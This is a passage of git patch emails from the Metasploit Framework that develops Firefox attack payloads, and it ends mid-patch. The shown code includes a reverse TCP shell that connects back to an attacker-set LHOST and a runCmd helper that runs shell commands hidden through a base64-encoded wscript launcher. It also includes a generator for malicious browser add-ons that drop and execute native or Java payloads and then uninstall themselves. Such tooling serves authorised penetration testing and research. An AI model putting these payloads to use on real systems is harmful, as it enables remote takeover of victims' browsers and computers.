-          binaryStream.setInputStream(fileStream);
-          var array = binaryStream.readByteArray(fileStream.available());
-
-          binaryStream.close();
-          fileStream.close();
-          file.remove(true);
-
-          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
-        } catch (e) { return ["",""]; }
-      };
+      #{read_file_source}
+      #{run_cmd_source}
 
       serverSocket.asyncListen(listener);
     })();
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index 17ba2e16d4..9cca4e226b 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -14,6 +14,7 @@ require 'msf/base/sessions/command_shell'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::Firefox
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -45,10 +46,6 @@ module Metasploit3
     %Q|
     (function(){
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
-
-      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
-        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
-
       var host = '#{datastore["LHOST"]}';
       var port = #{datastore["LPORT"]};
 
@@ -74,64 +71,8 @@ module Metasploit3
         }
       };
 
-      var runCmd = function(cmd) {
-        var shPath = "/bin/sh";
-        var shFlag = "-c";
-        var shEsc = "\\\\$&";
-
-        if (ua.indexOf("Windows")>-1) {
-          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
-          shFlag = "/c";
-          shEsc = "\\^$&";
-        }
-
-        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-
-        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stdout.append(stdoutFile);
-
-        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stderr.append(stderrFile);
-
-        var sh = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-        sh.initWithPath(shPath);
-
-        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
-        var process = Components.classes["@mozilla.org/process/util;1"]
-          .createInstance(Components.interfaces.nsIProcess);
-        process.init(sh);
-        process.run(true, [shFlag, shell], 2);
-        return [readFile(stdout.path), readFile(stderr.path)];
-      };
-
-      var readFile = function(path) {
-        try {
-          var file = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-          file.initWithPath(path);
-
-          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
-                           .createInstance(Components.interfaces.nsIFileInputStream);
-          fileStream.init(file, 1, 0, false);
-
-          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
-                             .createInstance(Components.interfaces.nsIBinaryInputStream);
-          binaryStream.setInputStream(fileStream);
-          var array = binaryStream.readByteArray(fileStream.available());
-
-          binaryStream.close();
-          fileStream.close();
-          file.remove(true);
-
-          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
-        } catch (e) { return ""; }
-      };
+      #{read_file_source}
+      #{run_cmd_source}
 
       pump.asyncRead(listener, null);
     })();

From 9b39ea55eec0f686aa40b2479a182dca04f0b992 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 02:22:16 -0600
Subject: [PATCH 04/24] Fix comment.{

---
 lib/msf/core/module/platform.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb
index af8bc8b450..ad2131a6ec 100644
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -518,7 +518,7 @@ class Msf::Module::Platform
   end
 
   #
-  # Node.js
+  # Firefox
   #
   class Firefox < Msf::Module::Platform
     Rank = 100

From 8d3130b19e26d9ca8abb33c625dd69d5a3910d87 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 02:23:38 -0600
Subject: [PATCH 05/24] Reorder targets.

---
 .../exploit/remote/firefox_addon_generator.rb | 20 ++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
index fc226c2245..194b20fb02 100644
--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -23,7 +23,7 @@ module Exploit::Remote::FirefoxAddonGenerator
           [ 'Universal (Javascript XPCOM Shell)',
             {
               'Platform' => 'firefox',
-              'Arch' => 'firefox'
+              'Arch' => ARCH_FIREFOX
             }
           ],
           [ 'Java Payload',
@@ -38,12 +38,24 @@ module Exploit::Remote::FirefoxAddonGenerator
               'Arch' => ARCH_X86
             }
           ],
+          [ 'Windows x64 (Native Payload)',
+            {
+              'Platform' => 'windows',
+              'Arch' => ARCH_X64
+            }
+          ],
           [ 'Linux x86 (Native Payload)',
             {
               'Platform' => 'linux',
               'Arch' => ARCH_X86
             }
           ],
+          [ 'Linux x64 (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64
+            }
+          ],
           [ 'Mac OS X PPC (Native Payload)',
             {
               'Platform' => 'osx',
@@ -55,6 +67,12 @@ module Exploit::Remote::FirefoxAddonGenerator
               'Platform' => 'osx',
               'Arch' => ARCH_X86
             }
+          ],
+          [ 'Mac OS X x64 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X64
+            }
           ]
         ],
       'DefaultTarget' => 0

From 12fece3aa602c849b4de16218ee9a57b988cc436 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 10:19:49 -0600
Subject: [PATCH 06/24] Kill unnecessary comment.

---
 modules/payloads/singles/firefox/shell_bind_tcp.rb    | 4 ----
 modules/payloads/singles/firefox/shell_reverse_tcp.rb | 5 +----
 2 files changed, 1 insertion(+), 8 deletions(-)

diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index d3dc07316d..278531ea46 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -3,10 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# It would be better to have a commonjs payload, but because the implementations
-# differ so greatly when it comes to require() paths for net modules, we will
-# settle for just getting shells on nodejs.
-
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/firefox'
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index 9cca4e226b..ef9ed5785a 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -3,12 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# It would be better to have a commonjs payload, but because the implementations
-# differ so greatly when it comes to require() paths for net modules, we will
-# settle for just getting shells on nodejs.
-
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/firefox'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3

From 1b0e99b4486eee4a05c3a637dc53b2cd2b820351 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 10:46:57 -0600
Subject: [PATCH 07/24] Update proto_crmfrequest module.

---
 modules/exploits/multi/browser/firefox_proto_crmfrequest.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
index 234e87b0f0..44cc50957e 100644
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::FirefoxAddonGenerator
 
   def initialize(info = {})
@@ -57,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     if request.uri.match(/\.xpi$/i)
       print_status("Sending the malicious addon")
-      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
+      send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })
     else
       print_status("Sending HTML")
       send_response_html(cli, generate_html(target_info))

From 06fb2139b05538eda66f13aebaddc8c381bcb050 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Thu, 2 Jan 2014 14:05:06 -0600
Subject: [PATCH 08/24] Digging around to get shell_command_token to work.

---
 lib/msf/core/payload/firefox.rb                      | 12 +++++++-----
 .../multi/browser/firefox_proto_crmfrequest.rb       |  2 +-
 .../payloads/singles/firefox/shell_reverse_tcp.rb    |  1 -
 3 files changed, 8 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index ba22ba35a7..a1b5237e10 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -3,7 +3,7 @@ require 'msf/core'
 
 module Msf::Payload::Firefox
   def read_file_source
-    %q|
+    %Q|
       var readFile = function(path) {
         try {
           var file = Components.classes["@mozilla.org/file/local;1"]
@@ -23,16 +23,17 @@ module Msf::Payload::Firefox
           fileStream.close();
           file.remove(true);
 
-          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
-        } catch (e) { return ["",""]; }
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
+        } catch (e) { return ""; }
       };
     |
   end
 
   def run_cmd_source
-    %q|
+    %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var _cmd;
       var runCmd = function(cmd) {
         var shPath = "/bin/sh";
         var shFlag = "-c";
@@ -61,7 +62,8 @@ module Msf::Payload::Firefox
                    .createInstance(Components.interfaces.nsILocalFile);
         sh.initWithPath(shPath);
 
-        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        var shell = shPath + " " + shFlag + " " + cmd.replace(/\\W/g, shEsc);
+        shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
 
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
index 44cc50957e..d6e949b9c5 100644
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
       <body>
       #{datastore['CONTENT']}
       <div id='payload' style='display:none'>
-      if (!window.done){
+      if (!window.done) {
         window.AddonManager.getInstallForURL(
           '#{get_module_uri}/addon.xpi',
           function(install) { install.install() },
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index ef9ed5785a..e9e8341fc7 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -64,7 +64,6 @@ module Metasploit3
           var data = NetUtil.readInputStreamToString(stream, count).trim();
           var output = runCmd(data);
           outStream.write(output[0], output[0].length);
-          outStream.flush();
         }
       };
 

From 7961b3eecd127a4e2cde1a6b448ca64e8d5ec0e5 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Fri, 3 Jan 2014 01:29:34 -0600
Subject: [PATCH 09/24] Rework windows shell to use wscript.

---
 lib/msf/core/payload/firefox.rb | 69 ++++++++++++++++++++++++++-------
 1 file changed, 54 insertions(+), 15 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index a1b5237e10..82def81d02 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -33,16 +33,28 @@ module Msf::Payload::Firefox
     %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
-      var _cmd;
+      var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd) {
         var shPath = "/bin/sh";
         var shFlag = "-c";
         var shEsc = "\\\\$&";
+        var windows = (ua.indexOf("Windows")>-1);
 
-        if (ua.indexOf("Windows")>-1) {
-          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
-          shFlag = "/c";
+        if (windows) {
           shEsc = "\\^$&";
+          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
+            .getService(Components.interfaces.nsIProperties)
+            .get("TmpD", Components.interfaces.nsIFile);
+          jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8)}.js');
+          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+            .createInstance(Components.interfaces.nsIFileOutputStream);
+          stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
+          stream.write(jscript, jscript.length);
+          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+            stream.finish();
+          } else {
+            stream.close();
+          }
         }
 
         var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
@@ -58,19 +70,46 @@ module Msf::Payload::Firefox
           .get("TmpD", Components.interfaces.nsIFile);
         stderr.append(stderrFile);
 
-        var sh = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-        sh.initWithPath(shPath);
-
-        var shell = shPath + " " + shFlag + " " + cmd.replace(/\\W/g, shEsc);
-        shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
-
+        if (windows) {
+          var shell = "cmd /c "+cmd;
+          shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
+        }
+        else {
+          var shell = [shPath, shFlag, cmd.replace(/\\W/g, shEsc)].join(" ");
+          shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        }
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
-        process.init(sh);
-        process.run(true, [shFlag, shell], 2);
-        return [readFile(stdout.path), readFile(stderr.path)];
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+
+        if (windows) {
+          sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
+          process.init(sh);
+          var args = [jscriptFile.path, shell];
+          process.run(true, args, args.length);
+        } else {
+          sh.initWithPath(shPath);
+          process.init(sh);
+          process.run(true, [shFlag, shell], 2);
+        }
+
+        if (windows) {
+          jscriptFile.remove(true);
+          return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
+        }
+        else {
+          return [readFile(stdout.path), readFile(stderr.path)];
+        }
       };
     |
   end
-end
\ No newline at end of file
+
+  def jscript_launcher
+    %Q|
+      var cmdStr = '';
+      for (var i = 0; i < WScript.arguments.length; i++) cmdStr += WScript.arguments(i) + " ";
+      (new ActiveXObject("WScript.Shell")).Run(cmdStr, 0, true);
+    |
+  end
+end

From 13464d0aaeedd679e151d4255585b90471439046 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Fri, 3 Jan 2014 01:34:57 -0600
Subject: [PATCH 10/24] Minor cleanup of firefox.rb.

---
 lib/msf/core/payload/firefox.rb | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 82def81d02..6c5cc44539 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -35,8 +35,6 @@ module Msf::Payload::Firefox
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd) {
-        var shPath = "/bin/sh";
-        var shFlag = "-c";
         var shEsc = "\\\\$&";
         var windows = (ua.indexOf("Windows")>-1);
 
@@ -73,10 +71,9 @@ module Msf::Payload::Firefox
         if (windows) {
           var shell = "cmd /c "+cmd;
           shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
-        }
-        else {
-          var shell = [shPath, shFlag, cmd.replace(/\\W/g, shEsc)].join(" ");
-          shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        } else {
+          var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(" ");
+          shell = "/bin/sh -c "+(shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
         }
         var process = Components.classes["@mozilla.org/process/util;1"]
           .createInstance(Components.interfaces.nsIProcess);
@@ -89,9 +86,9 @@ module Msf::Payload::Firefox
           var args = [jscriptFile.path, shell];
           process.run(true, args, args.length);
         } else {
-          sh.initWithPath(shPath);
+          sh.initWithPath("/bin/sh");
           process.init(sh);
-          process.run(true, [shFlag, shell], 2);
+          process.run(true, ["-c", shell], 2);
         }
 
         if (windows) {

From 8fd517f9ef2c9866e2c0f4b915fbc1180543f4cf Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Fri, 3 Jan 2014 16:14:28 -0600
Subject: [PATCH 11/24] Fixes shell escaping errors with nested quotes in
 windows.

---
 lib/msf/core/payload/firefox.rb | 18 +++++++++++++-----
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 6c5cc44539..52f9a34986 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -33,6 +33,7 @@ module Msf::Payload::Firefox
     %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
         .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd) {
         var shEsc = "\\\\$&";
@@ -71,8 +72,9 @@ module Msf::Payload::Firefox
         if (windows) {
           var shell = "cmd /c "+cmd;
           shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
+          var b64 = svcs.btoa(shell);
         } else {
-          var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(" ");
+          var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(".");
           shell = "/bin/sh -c "+(shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
         }
         var process = Components.classes["@mozilla.org/process/util;1"]
@@ -83,7 +85,7 @@ module Msf::Payload::Firefox
         if (windows) {
           sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
           process.init(sh);
-          var args = [jscriptFile.path, shell];
+          var args = [jscriptFile.path, b64];
           process.run(true, args, args.length);
         } else {
           sh.initWithPath("/bin/sh");
@@ -104,9 +106,15 @@ module Msf::Payload::Firefox
 
   def jscript_launcher
     %Q|
-      var cmdStr = '';
-      for (var i = 0; i < WScript.arguments.length; i++) cmdStr += WScript.arguments(i) + " ";
-      (new ActiveXObject("WScript.Shell")).Run(cmdStr, 0, true);
+      var b64 = WScript.arguments(0);
+      var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");
+      var el  = dom.createElement("root");
+      el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);
+      var stream = new ActiveXObject("ADODB.Stream");
+      stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);
+      stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;
+      var cmd = stream.ReadText();
+      (new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
     |
   end
 end

From a5ebdce2621569ce4709026e22a6fd7e140e6ad0 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Fri, 3 Jan 2014 18:23:48 -0600
Subject: [PATCH 12/24] Add exec payload. Cleans up a lot of code.

Adds some yardocs and whatnot.
---
 .../exploit/remote/firefox_addon_generator.rb | 73 +++++++++++--------
 lib/msf/core/payload/firefox.rb               | 52 +++++++++----
 modules/payloads/singles/firefox/exec.rb      | 39 ++++++++++
 .../singles/firefox/shell_reverse_tcp.rb      | 70 ++++++++----------
 4 files changed, 148 insertions(+), 86 deletions(-)
 create mode 100644 modules/payloads/singles/firefox/exec.rb

diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
index 194b20fb02..20eca6d76a 100644
--- a/lib/msf/core/exploit/remote/firefox_addon_generator.rb
+++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb
@@ -103,26 +103,33 @@ module Exploit::Remote::FirefoxAddonGenerator
       payload_file = jar.pack
       payload_name='payload.jar'
       payload_script=%q|
-  var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
-  java.lang.System.setSecurityManager(null);
-  var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
-  var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
-  m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
+        var java = Components.classes["@mozilla.org/appshell/window-mediator;1"]
+          .getService(Components.interfaces.nsIWindowMediator)
+          .getMostRecentWindow('navigator:browser').Packages.java;
+        java.lang.System.setSecurityManager(null);
+        var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
+        var m = cl.loadClass("metasploit.Payload").getMethod("main",
+          [java.lang.Class.forName("[Ljava.lang.String;")]
+        );
+        m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
       |
     else
       payload_file = generate_payload_exe
       return nil if payload_file.nil?
       payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
       payload_script=%q|
-  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
-  process.init(tmp);
-  process.run(false,[],0);
+        var process=Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(tmp);
+        process.run(false,[],0);
       |
       if target.name != 'Windows x86 (Native Payload)'
         payload_script = %q|
-        var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+        var chmod=Components.classes["@mozilla.org/file/local;1"]
+          .createInstance(Components.interfaces.nsILocalFile);
         chmod.initWithPath("/bin/chmod");
-        var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+        var process=Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
         process.init(chmod);
         process.run(true, ["+x", tmp.path], 2);
         | + payload_script
@@ -135,22 +142,22 @@ module Exploit::Remote::FirefoxAddonGenerator
 
     if target.name !~ /Javascript/
       bootstrap_script << %q|
-    var file = Components.classes["@mozilla.org/file/directory_service;1"].
-            getService(Components.interfaces.nsIProperties).
-            get("ProfD", Components.interfaces.nsIFile);
-    file.append("extensions");
+        var file = Components.classes["@mozilla.org/file/directory_service;1"].
+                getService(Components.interfaces.nsIProperties).
+                get("ProfD", Components.interfaces.nsIFile);
+        file.append("extensions");
       |
       bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
       bootstrap_script << %Q|payload_name="#{payload_name}";|
       bootstrap_script << %q|
-    file.append(xpi_guid);
-    file.append(payload_name);
-    var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
-            getService(Components.interfaces.nsIProperties).
-            get("TmpD", Components.interfaces.nsIFile);
-    tmp.append(payload_name);
-    tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
-    file.copyTo(tmp.parent, tmp.leafName);
+        file.append(xpi_guid);
+        file.append(payload_name);
+        var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+                getService(Components.interfaces.nsIProperties).
+                get("TmpD", Components.interfaces.nsIFile);
+        tmp.append(payload_name);
+        tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+        file.copyTo(tmp.parent, tmp.leafName);
       |
     end
 
@@ -158,15 +165,19 @@ module Exploit::Remote::FirefoxAddonGenerator
 
     if (datastore['AutoUninstall'])
       bootstrap_script <<  %q|
-  try { // Fx < 4.0
-    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
-  } catch (e) {}
-  try { // Fx 4.0 and later
-    Components.utils.import("resource://gre/modules/AddonManager.jsm");
-    AddonManager.getAddonByID(xpi_guid, function(addon) {
-      addon.uninstall();
-    });
-  } catch (e) {}
+        function uninstallMe() {
+          try { // Fx < 4.0
+            Components.classes["@mozilla.org/extensions/manager;1"]
+              .getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+          } catch (e) {}
+          try { // Fx 4.0 and later
+            Components.utils.import("resource://gre/modules/AddonManager.jsm");
+            AddonManager.getAddonByID(xpi_guid, function(addon) {
+              addon.uninstall();
+            });
+          } catch (e) {}
+        }
+        uninstallMe();
       |
     end
 
diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 52f9a34986..5670fede5e 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -2,6 +2,11 @@
 require 'msf/core'
 
 module Msf::Payload::Firefox
+
+  # Javascript source code of readFile(path) - synchronously reads a file and returns
+  # its contents. The file is deleted immediately afterwards.
+  #
+  # @return [String] javascript source code that exposes the readFile(path) method
   def read_file_source
     %Q|
       var readFile = function(path) {
@@ -29,6 +34,20 @@ module Msf::Payload::Firefox
     |
   end
 
+  # Javascript source code of runCmd(str) - runs a shell command on the OS
+  #
+  # Because of a limitation of firefox, we cannot retrieve the shell output
+  # so the stdout/err are instead redirected to a temp file, which is read and
+  # destroyed after the command completes.
+  #
+  # On posix, the command is double wrapped in "/bin/sh -c" calls, the outer of
+  # which redirects stdout.
+  #
+  # On windows, the command is wrapped in two "cmd /c" calls, the outer of which
+  # redirects stdout. A JScript file "launch" file is then used to run the command
+  # without displaying the command prompt.
+  #
+  # @return [String] javascript source code that exposes the runCmd(str) method.
   def run_cmd_source
     %Q|
       var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
@@ -37,14 +56,16 @@ module Msf::Payload::Firefox
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd) {
         var shEsc = "\\\\$&";
+        var shPath = "/bin/sh -c"
         var windows = (ua.indexOf("Windows")>-1);
 
         if (windows) {
+          shPath = "cmd /c";
           shEsc = "\\^$&";
           var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
             .getService(Components.interfaces.nsIProperties)
             .get("TmpD", Components.interfaces.nsIFile);
-          jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8)}.js');
+          jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8+rand(12))}.js');
           var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
             .createInstance(Components.interfaces.nsIFileOutputStream);
           stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
@@ -56,8 +77,8 @@ module Msf::Payload::Firefox
           }
         }
 
-        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
 
         var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
           .getService(Components.interfaces.nsIProperties)
@@ -70,12 +91,12 @@ module Msf::Payload::Firefox
         stderr.append(stderrFile);
 
         if (windows) {
-          var shell = "cmd /c "+cmd;
-          shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
+          var shell = shPath+" "+cmd;
+          shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
           var b64 = svcs.btoa(shell);
         } else {
-          var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(".");
-          shell = "/bin/sh -c "+(shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+          var shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
